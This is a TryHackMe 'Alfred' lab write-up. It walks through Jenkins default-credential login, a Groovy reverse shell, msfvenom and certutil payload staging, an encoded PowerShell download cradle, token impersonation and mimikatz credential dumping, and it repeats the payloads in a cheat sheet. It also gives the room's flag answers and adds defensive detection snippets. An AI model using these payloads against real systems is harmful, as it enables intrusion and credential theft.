Alfred - TryHackMe
10 min read
Published at: Feb 16, 2024
Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.
Metadata
- Room name: Alfred
- URL: https://tryhackme.com/room/alfred
Goal
Learn how to exploit common misconfigurations, mainly with the Nishang tool - and then escalate privileges.
Cheat Sheet
Before we begin, as always there is a generic Cheat Sheet for this room which could be integrated into your own notes. You'll find it at the bottom of this write-up. You can also find all of my notes at https://hailstormsec.com/posts/categories/notes.
Tasks
Task 1 - Initial Access
Questions(s)
- How many ports are open? (TCP only)
- What is the username and password for the login panel? (in the format username:password)
- What is the user.txt flag?
If you've read my write-ups before you know I like to scan in at least two stages - an initial scan and a narrow scan.
Initial scan:
sudo nmap -p- -v
Add -Pn if the target is a Windows machine.
Narrow secondary scan:
sudo nmap -v -A -sC --script vuln -p PORTS
The narrow scan found a robots.txt file on port 8080 - but it is useless.
We begin to look at the two web servers on port 80 and 8080.
Port 80:
Not super interesting - maybe the email could be used later...
Port 8080:
This is however interesting... if we find out the login we will have access to the Jenkins panel!
We can start by googling the default credentials for Jenkins:
From this, a good starting point is trying 'admin' as the username. Note that the login panel does not respond differently when only the username is correct (assuming admin is the username), so there is no username enumeration to lean on.
In my case I just tried a handful of passwords before finding the right one, admin:admin - however if you struggle you can default to Hydra or Burp Intruder (or a similar tool).
Now we want to find a way to execute stuff on the server. The logical place to find this is under 'Manage Jenkins', and there we go!
This is looking real promising! A simple google search later leads me to this article with a plethora of ways to abuse this functionality. I went for a simple reverse shell to the server:
String host="10.14.46.99";
int port=4444;
String cmd="cmd.exe";
// start cmd.exe and connect back to the listener
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
// pump bytes between the process and the socket until either side closes
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();
  Thread.sleep(50);
  try {p.exitValue();break;}catch (Exception e){}
};
p.destroy();s.close();
To catch the shell in metasploit I used:
msfconsole -qx 'use exploit/multi/handler;set lhost tun0;set lport 4444;run'
Now all you have to do is press run!
Unfortunately we cannot instantly upgrade the shell to a meterpreter and have to do it the manual way: generate a payload and upload it to the server.
Generate payload:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.14.46.99 LPORT=4443 -f exe -o meterpreter.exe
Download the payload (certutil is installed by default):
certutil -URLcache -split -f http://10.14.46.99:8000/meterpreter.exe meterpreter.exe
Start a handler (the handler's payload must match what msfvenom built above, i.e. the x86 windows/meterpreter/reverse_tcp, not the x64 variant):
msfconsole -qx 'use exploit/multi/handler;set lhost tun0;set lport 4443;set payload windows/meterpreter/reverse_tcp;run'
And execute the payload: .\meterpreter.exe
Bonus ways of getting access
In the process of finding the way that I did, I also found a metasploit module and a way to instantly get a meterpreter shell. There is also what I assume is the intended way to do it:
- Metasploit:
use exploit/multi/http/jenkins_script_console
- Then I found this article which I kept building upon. It uses a PowerSploit module to send back a payload. See the script below. Note: I never managed to receive the shell back due to the server timing out. I suspect the issue is the server resources since it successfully downloaded the payload.
#!/bin/bash
# meterpreter ip & port
lhost=10.14.46.99
lport=4444
echo " * Writing Payload"
# PowerSploit's Invoke-Shellcode, followed by the call that stages meterpreter
cat /usr/share/windows-resources/powersploit/CodeExecution/Invoke-Shellcode.ps1 > payload
echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> payload
echo " * Prepping Command"
# download cradle that fetches and runs the payload from our HTTP server
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://${lhost}:8000/payload')"
echo "$scriptblock"
echo
echo " * Encoding command"
# PowerShell -Enc expects base64 of a UTF-16LE string
encode="$(echo "$scriptblock" | iconv --to-code UTF-16LE | base64 -w 0)"
echo "$encode"
command="cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc $encode"
echo
echo " * Final command"
echo "$command"
echo
echo " * Groovy command "
# paste these two lines into the Jenkins script console
echo " def process=\"$command\".execute();"
echo " println(\"\${process.text}\"); "
echo
echo " * Starting HTTP Server to serve payload"
python3 -m http.server
- The proper way to do it - there is another way to communicate with the server through the Jenkins web application:
Now you just have to host the PowerShell payload provided (python3 -m http.server) and start a handler to catch the shell (either Metasploit with use exploit/multi/handler, or netcat).
Now with a meterpreter shell, we can just read the user flag:
Answer(s)
- 3
- admin:admin
- 79007a09481963edf2e1321abd9ae2a0
Task 2 - Switching Shells
Question(s)
What is the final size of the exe payload that you generated?
I accidentally did this in the last task with the same payload - so I just entered the final size and jumped to the next task.
Answer(s)
73802
Task 3 - Privilege Escalation
Windows uses token-based permissions: an access token is created (usually by lsass.exe) when a user logs in or authenticates.
This access token consists of:
- User SIDs (security identifier)
- Group SIDs
- Privileges
- And more...
Two types of access tokens:
- Primary access tokens: those associated with a user account that are generated on log on
- Impersonation tokens: these allow a particular process (or a thread in a process) to gain access to resources using the token of another (user/client) process. Think of it like SUID bits in Linux. Levels of impersonation token:
  - SecurityAnonymous: current user/client cannot impersonate another user/client
  - SecurityIdentification: current user/client can get the identity and privileges of a client but cannot impersonate the client
  - SecurityImpersonation: current user/client can impersonate the client's security context on the local system
  - SecurityDelegation: current user/client can impersonate the client's security context on a remote system
Distinguishing an impersonation token from a primary token
Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).
Here are the most commonly abused privileges:
- SeImpersonatePrivilege
- SeAssignPrimaryTokenPrivilege
- SeTcbPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
- SeDebugPrivilege
There's more reading here. To list privileges: whoami /priv
Question(s)
- Use the impersonate_token "BUILTIN\Administrators" command to impersonate the Administrators' token. What is the output when you run the getuid command?
- Read the root.txt file located at C:\Windows\System32\config
We begin listing our privileges:
Comparing with what we have just learned, two commonly exploited privileges are:
- SeImpersonatePrivilege
- SeDebugPrivilege
Both of which we have enabled.
If both of these are enabled we can load incognito in meterpreter ([load/use] incognito) and use any impersonation token:
Meterpreter modules: to list all modules you can load, simply type load and then press Tab twice. After you've loaded a module, you will find its commands at the bottom of the help command's output.
Even though we are now impersonating `NT AUTHORITY\SYSTEM`, we may still lack elevated privileges because Windows checks the process's primary access token rather than the impersonation token. To make sure we have the correct privileges we can migrate into a process that already runs as SYSTEM: `migrate -N services.exe`. If successful, we can access the root folder and read the final flag:
BONUS:
To get all the credentials on the system, we can load the kiwi (mimikatz) module:
Now we can compare the hashdump (no module required) vs the mimikatz outputs:
Answer(s)
- NT AUTHORITY\SYSTEM
- dff0f748678f280250f25a45b8046b4a
Cheat Sheet
Nmap
Initial port scan:
sudo nmap -p- -v
Add -Pn if the target is a Windows machine.
Narrow secondary scan:
sudo nmap -v -A -sC --script vuln -p PORTS
Payloads
Msfvenom: Reverse meterpreter shell:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.14.46.99 LPORT=4443 -f exe -o meterpreter.exe
Groovy:
String host="10.14.46.99";
int port=4444;
String cmd="cmd.exe";
// start cmd.exe and connect back to the listener
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
// pump bytes between the process and the socket until either side closes
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();
  Thread.sleep(50);
  try {p.exitValue();break;}catch (Exception e){}
};
p.destroy();s.close();
https://www.hackingarticles.in/exploiting-jenkins-groovy-script-console-in-multiple-ways/
#!/bin/bash
# meterpreter ip & port
lhost=10.14.46.99
lport=4444
echo " * Writing Payload"
# PowerSploit's Invoke-Shellcode, followed by the call that stages meterpreter
cat /usr/share/windows-resources/powersploit/CodeExecution/Invoke-Shellcode.ps1 > payload
echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> payload
echo " * Prepping Command"
# download cradle that fetches and runs the payload from our HTTP server
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://${lhost}:8000/payload')"
echo "$scriptblock"
echo
echo " * Encoding command"
# PowerShell -Enc expects base64 of a UTF-16LE string
encode="$(echo "$scriptblock" | iconv --to-code UTF-16LE | base64 -w 0)"
echo "$encode"
command="cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc $encode"
echo
echo " * Final command"
echo "$command"
echo
echo " * Groovy command "
# paste these two lines into the Jenkins script console
echo " def process=\"$command\".execute();"
echo " println(\"\${process.text}\"); "
echo
echo " * Starting HTTP Server to serve payload"
python3 -m http.server
Living off the Land (LOL/LotL)
What is LotL?
Living off the Land, or LOL/LotL, means that instead of uploading your own tools to the target machine you use what is there by default to accomplish the same goals. This greatly reduces the odds of tripping alarms in the EDR system.
Download file:
certutil -URLcache -split -f http://10.14.46.99:8000/meterpreter.exe meterpreter.exe
Host webserver
python -m http.server [--bind 0.0.0.0 <port>]
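As an added example (my own code, not part of the write-up or the room), here is how a defender might flag the two LotL patterns used above in process-creation command lines: certutil -URLcache downloads, and the PowerShell -Enc one-liner that the Invoke-Shellcode script builds. The log lines are constructed, and the decoder simply reverses the script's iconv UTF-16LE + base64 step.

```python
import base64
import re
from typing import List, Optional

# Patterns taken from the write-up's own LotL commands: certutil used as a
# downloader, and a PowerShell one-liner passed via -Enc/-EncodedCommand.
CERTUTIL_RE = re.compile(r"certutil(?:\.exe)?\b.*-urlcache\b.*\bhttps?://", re.IGNORECASE)
ENC_RE = re.compile(r"-(?:enc|encodedcommand|e|ec)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Return the plaintext behind a PowerShell -Enc argument, or None.
    -Enc expects base64 of UTF-16LE text, exactly what the script's pipeline makes."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le").strip()
    except (ValueError, UnicodeDecodeError):
        return None

def classify(cmdline: str) -> List[str]:
    """Return the detection labels that fire for one process command line."""
    hits = []
    if CERTUTIL_RE.search(cmdline):
        hits.append("certutil-download")
    decoded = decode_encoded_powershell(cmdline)
    if decoded is not None:
        hits.append("encoded-powershell")
        low = decoded.lower()
        if "downloadstring" in low or "iex" in low or "invoke-expression" in low:
            hits.append("download-cradle")
    return hits

def build_encoded(script: str) -> str:
    """Mimic the write-up's encoding step so the constructed sample is realistic."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample command lines (not real logs): two from the write-up, two benign.
SAMPLE_CMDLINES = [
    "certutil -URLcache -split -f http://10.14.46.99:8000/meterpreter.exe meterpreter.exe",
    "cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc " + build_encoded(
        "iex (New-Object Net.WebClient).DownloadString('http://10.14.46.99:8000/payload')"),
    "certutil -hashfile C:\\Windows\\notepad.exe SHA256",
    "powershell.exe -NoProfile -Command Get-Date",
]

if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(classify(cmd) or ["-"], cmd[:70])
```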
Privileges in Windows
Windows uses token-based permissions: an access token is created (usually by lsass.exe) when a user logs in or authenticates.
This access token consists of:
- User SIDs (security identifier)
- Group SIDs
- Privileges
- And more...
Two types of access tokens:
- Primary access tokens: those associated with a user account that are generated on log on
- Impersonation tokens: these allow a particular process (or a thread in a process) to gain access to resources using the token of another (user/client) process. Think of it like SUID bits in Linux. Levels of impersonation token:
  - SecurityAnonymous: current user/client cannot impersonate another user/client
  - SecurityIdentification: current user/client can get the identity and privileges of a client but cannot impersonate the client
  - SecurityImpersonation: current user/client can impersonate the client's security context on the local system
  - SecurityDelegation: current user/client can impersonate the client's security context on a remote system
Distinguishing an impersonation token from a primary token
Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).
Here are the most commonly abused privileges:
- SeImpersonatePrivilege
- SeAssignPrimaryTokenPrivilege
- SeTcbPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
- SeDebugPrivilege
There's more reading here. To list privileges: whoami /priv
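Added example (my own code, not the room's): a small parser for whoami /priv output, as used in the Privilege Escalation task and in this cheat-sheet section, that flags which of the commonly abused privileges listed above are actually enabled. The sample output is constructed, not taken from the room.

```python
import re
from typing import Dict, List

# The write-up's list of commonly abused privileges, keyed by their Windows
# constant names, with a one-line reason each is dangerous when enabled.
ABUSED_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonate the tokens of connecting clients",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeCreateTokenPrivilege": "create arbitrary access tokens",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeDebugPrivilege": "open any process, including lsass.exe",
}

# One row of `whoami /priv`: name, free-text description, then Enabled/Disabled.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")

def parse_whoami_priv(output: str) -> Dict[str, bool]:
    """Map each privilege in `whoami /priv` output to True if it is Enabled."""
    privs = {}
    for line in output.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2) == "Enabled"
    return privs

def risky_enabled(output: str) -> List[str]:
    """Return the commonly abused privileges that are enabled, sorted by name."""
    privs = parse_whoami_priv(output)
    return sorted(p for p, on in privs.items() if on and p in ABUSED_PRIVILEGES)

# Constructed `whoami /priv` output for a service-style account (not from the room).
SAMPLE_OUTPUT = """\
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeDebugPrivilege              Debug programs                            Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeBackupPrivilege             Back up files and directories             Disabled
"""

if __name__ == "__main__":
    for name in risky_enabled(SAMPLE_OUTPUT):
        print(f"{name}: {ABUSED_PRIVILEGES[name]}")
```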
Meterpreter
Modules:
[load/use] <module-name>
Meterpreter modules: to list all modules you can load, simply type load and then press Tab twice. After you've loaded a module, you will find its commands at the bottom of the help command's output.
Migrate process:
migrate <PID>
migrate -N <process-name>
Support me
Thank you so much for reading and I hope you found it inspirational or helpful! You can best support me by doing any of the following below!
- Turn off Adblocker: A simple yet impactful way to support me for free.
- Sign Up: If you haven't already, consider signing up to get access to more content and receive optional newsletters.
- Buy Premium: Explore the Premium option for additional perks and exclusive content.
- Give a Tip: Your generosity is always very appreciated.
You can read more about the perks of being a Member or Subscriber here.
Additionally, you can stay updated and engage with me on social media: